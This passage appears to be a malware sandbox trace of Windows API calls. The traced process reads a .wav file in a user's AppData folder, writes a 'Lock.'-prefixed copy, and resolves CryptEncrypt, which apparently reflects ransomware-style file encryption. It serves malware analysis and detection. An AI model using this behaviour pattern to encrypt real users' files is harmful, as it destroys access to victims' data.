1 [0232.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0232.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0232.807] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0232.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0232.807] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0232.807] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0232.807] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0232.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0232.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0232.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0232.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0232.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0232.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0232.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0232.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0232.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0232.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0232.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0232.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0232.808] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/IYqWm9FjXEquwVFEM.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\iyqwm9fjxequwvfem.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0232.809] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.809] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0232.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0232.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0232.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0232.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0232.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0232.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0232.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0232.809] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0232.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0232.809] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0232.809] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0232.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0232.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0232.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0232.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0232.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0232.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0232.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0232.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0232.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0232.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0232.810] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0232.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0232.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0232.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0232.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0232.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0232.811] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.IYqWm9FjXEquwVFEM.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.iyqwm9fjxequwvfem.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0232.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0232.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0232.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0232.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0232.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0232.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0232.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0232.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0232.813] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0232.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0232.813] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0232.813] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0232.813] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0232.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0232.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0232.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0232.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0232.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0232.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0232.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0232.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0232.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0232.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0232.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0232.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0232.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0232.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe57020 [0232.817] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0232.817] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0xcb91, lpOverlapped=0x0) returned 1 [0232.820] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0232.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0232.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0232.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0232.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0232.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcb91) returned 0x2f14818 [0232.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe57020 | out: hHeap=0x970000) returned 1 [0232.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0232.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0232.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0232.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0232.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0232.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0232.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0232.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcb91) returned 0x2f213b8 [0232.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0232.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0232.826] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0232.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0232.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0232.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0232.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0232.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcb91) returned 0x2f14818 [0232.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0232.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0232.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0232.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0232.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0232.826] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0232.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0232.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0232.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0232.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0232.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0232.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0232.826] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0232.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0232.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0232.827] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0232.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0232.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0232.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0232.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0232.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0232.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0232.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0232.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0232.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcb91) returned 0x2f14818 [0232.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0232.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0232.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0232.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0232.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54fa8 [0232.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0232.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0232.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0232.828] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.828] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.828] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.829] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0232.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0232.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0232.829] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.829] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0232.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0232.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0232.829] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0232.829] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0232.829] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.829] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0232.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0232.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0232.829] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0232.830] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0232.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0232.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0232.830] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.872] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.872] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0232.873] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.873] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0232.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.873] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0232.874] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0232.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51388, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0232.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0232.875] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0232.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0232.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0232.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f760 [0232.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0232.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0232.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0232.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0232.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0232.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0232.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0232.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0232.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: 